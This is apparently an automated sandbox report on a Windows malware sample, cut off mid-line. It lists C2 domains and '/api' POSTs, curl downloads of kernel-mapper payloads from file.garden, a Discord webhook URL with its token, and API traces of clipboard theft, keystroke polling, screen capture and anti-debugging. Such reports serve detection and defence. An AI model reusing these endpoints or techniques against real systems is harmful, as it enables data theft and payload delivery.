Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: adcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.co equals www.youtube.com (Youtube)
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: adcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.coN equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: file.garden
Source: global traffic	DNS traffic detected: DNS query: tiddymarktwo.shop
Source: global traffic	DNS traffic detected: DNS query: surveriysiop.shop
Source: global traffic	DNS traffic detected: DNS query: captainynfanw.shop
Source: global traffic	DNS traffic detected: DNS query: tearrybyiwo.shop
Source: global traffic	DNS traffic detected: DNS query: appleboltelwk.shop
Source: global traffic	DNS traffic detected: DNS query: tendencerangej.shop
Source: global traffic	DNS traffic detected: DNS query: fossillargeiw.shop
Source: global traffic	DNS traffic detected: DNS query: coursedonnyre.shop
Source: global traffic	DNS traffic detected: DNS query: strappystyio.shop
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: offeviablwke.site
Source: global traffic	DNS traffic detected: DNS query: zelensky.top

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offeviablwke.site

Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 0000001F.00000002.2033274385.000001E66D2E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: powershell.exe, 0000001E.00000002.1903468013.000001BEF2E4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001E.00000002.1741738289.000001BEE3008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: msedge.exe, 0000000F.00000002.1695882943.00000000036C0000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.1855161247.000000000313C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1741738289.000001BEE2DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E654E51000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2177317135.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001E.00000002.1741738289.000001BEE3008000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 4tXm5yPtiy.exe	String found in binary or memory: http://www.houseindustries.com/license
Source: 4tXm5yPtiy.exe	String found in binary or memory: http://www.houseindustries.com/licenseBurbank
Source: 4tXm5yPtiy.exe	String found in binary or memory: http://www.houseindustries.com/licenseCopyright
Source: 4tXm5yPtiy.exe	String found in binary or memory: http://www.houseindustries.comhttp://www.talleming.comHouse
Source: powershell.exe, 0000001F.00000002.2016540956.000001E66D0F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: wCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.1855161247.000000000313C000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2177317135.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zelensky.top
Source: msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zelensky.top/
Source: wCnmgKwwXYQbWeNvWeCCOp.exe, 00000015.00000002.1855161247.000000000313C000.00000004.00000800.00020000.00000000.sdmp, wCnmgKwwXYQbWeNvWeCCOp.exe, 0000002F.00000002.2177317135.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000030.00000002.1942604735.00000000039E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://zelensky.top/RequestlongpolllinuxTrafficlocalpublicUploads.php
Source: powershell.exe, 0000001E.00000002.1741738289.000001BEE2DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1741648417.000001E654E51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 4tXm5yPtiy.exe	String found in binary or memory: https://auth.gg/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://coursedonnyre.shop/api
Source: 4tXm5yPtiy.exe	String found in binary or memory: https://discord.com/api/webhooks/1247249666907701321/mhniI9J0YWG308w-rJbT6rxKaLF0IflJIgI4sGWLEdUFWwO
Source: curl.exe, 00000004.00000002.1488445675.00000288C36E0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1488186724.00000288C371A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1488145977.00000288C3719000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1488445675.00000288C36F3000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1488506178.00000288C371A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1488268329.00000288C371A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin
Source: curl.exe, 00000004.00000002.1488445675.00000288C36E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin--outputC:
Source: curl.exe, 00000004.00000002.1488445675.00000288C36F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binM6
Source: curl.exe, 00000004.00000002.1488445675.00000288C36E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.binp.F
Source: curl.exe, 00000007.00000002.1504104457.000001FB23F78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin
Source: curl.exe, 00000007.00000002.1504104457.000001FB23F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin--outputC:
Source: curl.exe, 00000007.00000002.1504104457.000001FB23F78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin:l
Source: curl.exe, 00000007.00000002.1504104457.000001FB23F78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.binrc
Source: powershell.exe, 0000001F.00000002.1741648417.000001E655078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: powershell.exe, 0000001E.00000002.1903468013.000001BEF2E4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1900953090.000001E664EC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site/api
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E72000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://offeviablwke.site:443/api
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/p3W
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strappystyio.shop/api
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://surveriysiop.shop/api02
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiddymarktwo.shop/api(3
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.co
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.coN
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: RegAsm.exe, 0000000B.00000002.1545948383.0000000000E94000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.213:443 -> 192.168.2.8:49711 version: TLS 1.2

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

Code function: 0_2_00007FF68B492CE0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,

0_2_00007FF68B492CE0

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

Code function: 0_2_00007FF68B492CE0 OpenClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,

0_2_00007FF68B492CE0

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

Code function: 0_2_00007FF68B492A90 free,OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,malloc,memcpy,free,GlobalUnlock,CloseClipboard,

0_2_00007FF68B492A90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 11_2_00438E3C GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

11_2_00438E3C

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

Code function: 0_2_00007FF68B4BB2D0 GetAsyncKeyState,exit,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF68B4BB2D0

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

Code function: 0_2_00007FF68B4C36B0 PeekMessageA,TranslateMessage,DispatchMessageA,GetForegroundWindow,GetWindow,SetWindowPos,GetClientRect,ClientToScreen,GetCursorPos,GetAsyncKeyState,SetWindowPos,GetClientRect,QueryPerformanceCounter,GetKeyState,GetKeyState,GetKeyState,ClientToScreen,SetCursorPos,GetActiveWindow,GetCursorPos,ScreenToClient,GetAsyncKeyState,rand,GetAsyncKeyState,free,DestroyWindow,_invalid_parameter_noinfo_noreturn,

0_2_00007FF68B4C36B0

System Summary

.NET source code contains very large array initializations

Source: physmeme.exe.7.dr, MoveAngles.cs

Large array initialization: MoveAngles: array initializer size 360448

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4B4BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,		0_2_00007FF68B4B4BD0
Source: C:\Users\user\Desktop\4tXm5yPtiy.exe	Code function: 0_2_00007FF68B4B4760 GetModuleHandleA,GetProcAddress,VirtualProtect,VirtualProtect,LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,QueryPerformanceFrequency,QueryPerformanceCounter,QueryPerformanceCounter,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,		0_2_00007FF68B4B4760

Source: C:\Users\user\Desktop\4tXm5yPtiy.exe

Code function: 0_2_00007FF68B4C3ED0: CreateThread,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cin@std@@3V?$basic_istream@DU?$char_traits@D@std@@@1@A,??5?$basic_istream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@AEAH@Z,system,CreateFileW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,system,system,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,system,system,system,CreateFileW,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,_invalid_parameter_noinfo_noreturn,MessageBoxA,system,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,Process32Next,CloseHandle,DeviceIoControl,MessageBoxA,exit,CloseHandle,_beginthreadex,_Thrd_detach,_beginthreadex,_Thrd_detach,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,??6?$basic_ostream@DU?$char_t